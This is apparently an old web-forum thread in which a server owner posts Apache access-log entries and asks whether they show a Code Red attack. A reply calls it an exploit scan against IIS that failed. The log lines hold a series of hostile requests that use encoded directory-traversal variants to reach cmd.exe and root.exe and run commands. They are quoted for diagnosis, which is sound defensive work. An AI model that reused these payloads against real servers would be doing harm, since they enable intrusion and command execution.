hello all, i have an Apache server setup to share hardware pics on BBS/Forums, its 24/7 up..today i found some unusual enteries in the Access Log, can somebody please interpret these for me:

Is this Code RED worm attack?

TIA! :)

24.211.234.87 - - [15/Oct/2003:16:55:43 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
24.211.234.87 - - [15/Oct/2003:16:55:44 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
24.211.234.87 - - [15/Oct/2003:16:55:48 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.211.234.87 - - [15/Oct/2003:16:55:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.211.234.87 - - [15/Oct/2003:16:55:51 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.211.234.87 - - [15/Oct/2003:16:55:52 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.211.234.87 - - [15/Oct/2003:16:55:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.211.234.87 - - [15/Oct/2003:16:55:57 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.211.234.87 - - [15/Oct/2003:16:55:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:55:59 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:01 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:02 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.211.234.87 - - [15/Oct/2003:16:56:03 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.211.234.87 - - [15/Oct/2003:16:56:04 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.211.234.87 - - [15/Oct/2003:16:56:05 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

I can't confirm whether its a Code Red attack or not, as I'm not familiar with what that does.

However, it does appear to be some sort of exploit script meant to find holes on NT based servers.

It seems to be targeting IIS servers more specifically. Your server returned 404 and 400 errors to the script, so thats good. If you ever see one of those with a code 200 or similar, that could be bad.

Make SURE you secure your Windows server. There are lots of tricks and things you need to do.